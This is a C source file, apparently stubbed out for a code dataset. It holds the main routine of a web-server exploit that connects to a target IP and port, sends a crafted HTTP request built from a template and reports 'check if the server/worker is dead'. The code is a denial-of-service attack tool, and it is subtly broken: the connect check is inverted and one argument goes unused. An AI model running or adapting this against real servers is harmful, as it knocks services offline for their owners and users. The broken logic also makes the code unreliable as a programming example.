
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {int S_addr; } ;
struct TYPE_4__ {TYPE_1__ S_un; } ;
struct sockaddr_in {unsigned short sin_port; TYPE_2__ sin_addr; int sin_family; } ;
struct hostent {int dummy; } ;
typedef int WSADATA ;
typedef scalar_t__ SOCKET ;


 int AF_INET ;
 int BUFF_SIZE ;
 int IPPROTO_TCP ;
 int SD_BOTH ;
 scalar_t__ SOCKET_ERROR ;
 int SOCK_STREAM ;
 int WSACleanup () ;
 int WSAStartup (int,int *) ;
 int atoi (char*) ;
 int close (scalar_t__) ;
 int closesocket (scalar_t__) ;
 int connect (scalar_t__,struct sockaddr_in*,int) ;
 int die (char*) ;
 unsigned short htons (unsigned short) ;
 int inet_addr (char*) ;
 int nprintf (char*) ;
 char* request ;
 int send (scalar_t__,char*,int ,int ) ;
 int shutdown (scalar_t__,int ) ;
 scalar_t__ socket (int ,int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int strlen (char*) ;
 int usage () ;

void main(int argc, char *argv[]) {



 SOCKET hSock;
 unsigned short port;
 int buffsize = 1024;
 struct hostent *he;
 char exploit[BUFF_SIZE];
 struct sockaddr_in sa_in;
 char *offset;
 int i;
 port = htons(80);
 switch(argc) {
 case 5:
  buffsize = atoi(argv[4]);
 case 4:
  port = htons((unsigned short)atoi(argv[3]));
 case 3:
  break;
 case 2:
 case 1:
 default:
  usage();
 }



 hSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (hSock == SOCKET_ERROR) {
  die("Couldn't create exploit socket!");
 }



 sa_in.sin_family = AF_INET;
 sa_in.sin_port = port;
 sa_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);



 sprintf(&exploit[0], &request[0], argv[2]);



 if (!connect(hSock, &sa_in, sizeof(struct sockaddr_in)) == 0) {
  die("Couldn't connect; probably no web server there.");
 }



 send(hSock, &exploit[0], strlen(&exploit[0]), 0);
 nprintf("Exploit sent -- check if the server/worker is dead.");



 shutdown(hSock, SD_BOTH);

 close(hSock);




 return;
}
